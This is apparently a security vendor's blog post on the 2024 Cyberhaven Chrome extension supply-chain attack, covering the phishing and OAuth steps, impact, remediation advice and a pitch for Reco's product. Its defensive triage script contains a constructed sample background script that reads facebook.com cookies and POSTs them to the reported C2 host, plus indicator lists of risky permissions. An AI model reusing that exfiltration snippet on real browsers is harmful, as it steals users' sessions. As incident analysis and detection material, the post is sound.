Cyberhaven Supply Chain Attack: How One Phishing Email Led to Over 400,000 Compromised Browsers
On December 24, 2024, Cyberhaven, a data loss prevention provider, experienced a security breach involving its Chrome browser extension. What started as a phishing email led to a poisoned Chrome extension and quickly resulted in an estimated 400,000 compromised browsers.
Leveraging existing browser extension permissions and adding new ones, the threat actors were able to leak cookies and tokens, view browser history, exfiltrate data, and gain access to new victims.
Attack Overview
The attack started with a phishing email that pretended to be from Google Support. It warned the admin that the extension violated policies and was at risk of being removed.
The phishing link led to what looked like a legitimate Google OAuth page, where the admin unknowingly approved a malicious app called "Privacy Policy Extension."
The consent grant issued the attackers an OAuth access token for the Chrome Web Store developer account. The admin had already satisfied MFA during the legitimate-looking consent flow, so the token carried full publishing rights without ever prompting for a second factor. Using that token, the attackers uploaded a new version of the extension (v24.10.4) containing malicious code that passed Google's automated security scans, and Chrome's normal auto-update mechanism delivered it to Cyberhaven's user base.
This compromised extension was active for approximately 25 hours before Cyberhaven detected and removed it.
The Attack Chain
- A phishing email was received targeting ChromeOS & Chrome Enterprise developers.
- A developer clicked the phishing link, entered their credentials, and granted OAuth permissions to a malicious app.
- Threat actors gained access to the Chrome extension development environment and made unauthorized changes.
- A malicious version of the Chrome extension was published to the Chrome Web Store.
- Chrome's auto-update delivered the malicious version to an estimated 400,000 users.
- Browser cookies and credentials were stolen, targeting Facebook Ads accounts and certain AI platforms.
Technical Analysis
The malicious extension was a modified version of Cyberhaven's legitimate extension, with added code designed to:
- Contact a Command and Control (C&C) Server: The extension reached out to a hardcoded domain, cyberhavenext[.]pro, to fetch further instructions.
- Monitor User Activity: It registered event listeners to capture user interactions, concentrating on a specific set of target websites.
- Exfiltrate Data: The primary objective was to steal browser cookies and authenticated sessions, especially targeting Facebook Ads accounts.
The Impact
Cyberhaven’s Chrome extension was compromised and malicious code distributed to an estimated 400,000 enterprise users. The malicious app was designed to steal sensitive information like session cookies and credentials, with a specific focus on taking over Facebook Ads accounts.
This incident was not isolated to Cyberhaven. It was part of a broader campaign where hackers targeted and compromised multiple companies' Chrome extensions in order to create a wide network of backdoors to steal sensitive data. According to Secure Annex, the list of potentially poisoned extensions has risen to 29 and counting.
The Implications
The attacker bypassed standard MFA protections by exploiting a common yet under-secured SaaS-to-SaaS connection: 4th party apps. 4th party apps are software or scripts that are connected to your third-party apps. While they don't integrate with your system directly, they are connected by proxy and represent potential vulnerabilities outside of an organization’s purview and control.
Supply chain attacks are increasing, with one report citing an increase of as much as 180%. As organizations increasingly rely on third-party applications to support and scale business operations, the attack surface becomes a web of machine-to-machine connections, identities, and permissions. Least privilege offers little protection when the account that gets phished is the admin whose privileges are, by design, the broadest. And while MFA makes a human identity hard to hijack, app-to-app connections authenticate with tokens that MFA never touches: once a token has been granted, every request it makes is accepted without a second factor. This chain underscores just how vulnerable even well-defended systems can be when their third-party vendors become compromised.
Cyberhaven's Response
Upon discovering the breach on December 25, Cyberhaven acted swiftly:
- Removed the Malicious Extension: The compromised version was taken down within an hour of detection.
- Released a Clean Update: A new, secure version (24.10.5) of the extension was published promptly.
- Notified Affected Parties: Customers were informed about the incident and advised to check their systems for any suspicious activity.
- Enhanced Security Measures: The company engaged an external incident response firm for forensic analysis and is cooperating with federal law enforcement, with the aim of preventing a recurrence.
Recommendations for Users
Users who had the compromised extension installed should:
- Update the Extension: Ensure it's updated to version 24.10.5 or newer.
- Reset Sessions: Sign out of every site that was logged in from the affected browser and revoke existing sessions on the service side, so that any cookies already exfiltrated stop working; changing a password alone does not invalidate a live session on every platform.
- Review Account Activity: Check for any unauthorized access, especially on platforms like Facebook Ads.
- Change Passwords: Rotate passwords for accounts used in the affected browser, particularly those not protected by FIDO2 (phishing-resistant) multi-factor authentication.
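The Technical Analysis section above lists three behaviours of the poisoned build (a hardcoded C2 host, activity monitoring, cookie exfiltration), and the first recommendation is to confirm the installed version is 24.10.5 or newer. The script below is an added example, not Cyberhaven's or Reco's code, showing how an administrator could triage an unpacked extension directory offline against exactly those indicators: it compares the manifest version with the first clean release, flags permissions that give a poisoned build cookie and session reach, scans the background script for URL literals pointing at the C2 host named in this write-up, and looks for the cookie-harvesting API call. The only facts taken from the page are the version numbers and the cyberhavenext[.]pro host; the choice of risky permissions and the `chrome.cookies.getAll` pattern are my own indicators, and the sample manifest and background script are constructed for illustration, not the real extension's files.

```javascript
// Added example (not Cyberhaven's or Reco's code): offline triage of an
// unpacked Chrome extension against the indicators reported in the write-up.
// Facts from the write-up: first clean release 24.10.5, C2 host
// cyberhavenext[.]pro, goal = harvest facebook.com sessions. The permission
// list and API pattern below are the example author's own choice of indicators.

const FIRST_CLEAN_VERSION = "24.10.5";
const KNOWN_C2_HOSTS = ["cyberhavenext.pro"];
const RISKY_PERMISSIONS = new Set([
  "cookies", "webRequest", "webRequestBlocking", "tabs", "history", "scripting", "debugger",
]);

// Compare dotted version strings component by component, as Chrome does;
// a missing component counts as 0. Returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Every hostname that appears inside an http(s) URL literal in the script.
function extractHosts(source) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  let m;
  while ((m = re.exec(source)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

function isKnownC2(host) {
  return KNOWN_C2_HOSTS.some((c2) => host === c2 || host.endsWith("." + c2));
}

// Returns human-readable findings; an empty array means no indicator matched.
function triageExtension(manifest, backgroundSource) {
  const findings = [];

  // 1. Is the installed build older than the vendor's first clean release?
  if (compareVersions(manifest.version, FIRST_CLEAN_VERSION) < 0) {
    findings.push(`version ${manifest.version} predates first clean release ${FIRST_CLEAN_VERSION}`);
  }

  // 2. Permissions that give a poisoned build cookie/session reach.
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const p of perms) {
    if (RISKY_PERMISSIONS.has(p)) findings.push(`risky permission: ${p}`);
    if (p === "<all_urls>" || p.startsWith("*://*/")) findings.push(`broad host access: ${p}`);
  }

  // 3. Hardcoded endpoints that match the reported C2 host.
  for (const host of extractHosts(backgroundSource)) {
    if (isKnownC2(host)) findings.push(`known C2 host: ${host}`);
  }

  // 4. The exfiltration primitive itself.
  if (/chrome\.cookies\.getAll\s*\(/.test(backgroundSource)) {
    findings.push("background script calls chrome.cookies.getAll");
  }
  return findings;
}

// --- Constructed sample input (NOT the real extension's files) --------------
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Example DLP Extension",
  version: "24.10.4",
  permissions: ["cookies", "webRequest", "storage"],
  host_permissions: ["<all_urls>"],
};

const SAMPLE_BACKGROUND = `
// constructed for this example, not the real payload
const C2 = "https://cyberhavenext.pro/config";
async function loadConfig() { return (await fetch(C2)).json(); }
chrome.cookies.getAll({ domain: ".facebook.com" }, (cookies) => {
  fetch(C2, { method: "POST", body: JSON.stringify(cookies) });
});
`;

for (const f of triageExtension(SAMPLE_MANIFEST, SAMPLE_BACKGROUND)) {
  console.log("FINDING:", f);
}
```

Read the output as a review queue, not a verdict: a legitimate DLP extension will itself request `cookies` or broad host permissions, so the permission findings only tell you where to look, whereas a version below the first clean release or a URL literal pointing at the reported C2 host is a direct match on this incident's indicators. To run it against a real install, load `manifest.json` with `JSON.parse` and read the background script named in `background.service_worker` from the unpacked extension directory under the Chrome profile.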
How Reco Can Help
Reco, a leading SaaS security solution, is purpose-built to address and prevent SaaS supply chain attacks like the Cyberhaven attack.
- ITDR (Identity Threat Detection and Response): Reco monitors for identity-related threats, like compromised SaaS admin accounts or anomalous token activity based on suspicious IP addresses, locations, devices, and more. For example, Reco provides real-time alerts (see Figure 2), enabling you to act before an incident escalates.
- Posture Management: Reco reduces risks by identifying and addressing misconfigurations, such as overpermissioned users and admins, as well as high-risk authenticated tokens.
- SaaS to SaaS monitoring: Reco provides visibility into all 4th party apps and permission risks. Proactively identify Chrome extensions with overly permissive settings and gain visibility into app-to-app connections to prevent or reduce the impact of supply chain attacks.
Ready to Secure Your SaaS Ecosystem? Get Started with Reco Today
Reco can help organizations reduce the risk of supply chain attacks like the Cyberhaven attack, as well as detect and respond to them in real time. Our AI-based graph technology provides visibility into every app, identity, and their actions, allowing organizations to seamlessly prioritize and remediate risks and active threats. Reach out for a demo of Reco today.
Request a demo and explore Reco in action
ABOUT THE AUTHOR
Kate Turchin
Kate Turchin is the Director of Demand Generation at Reco.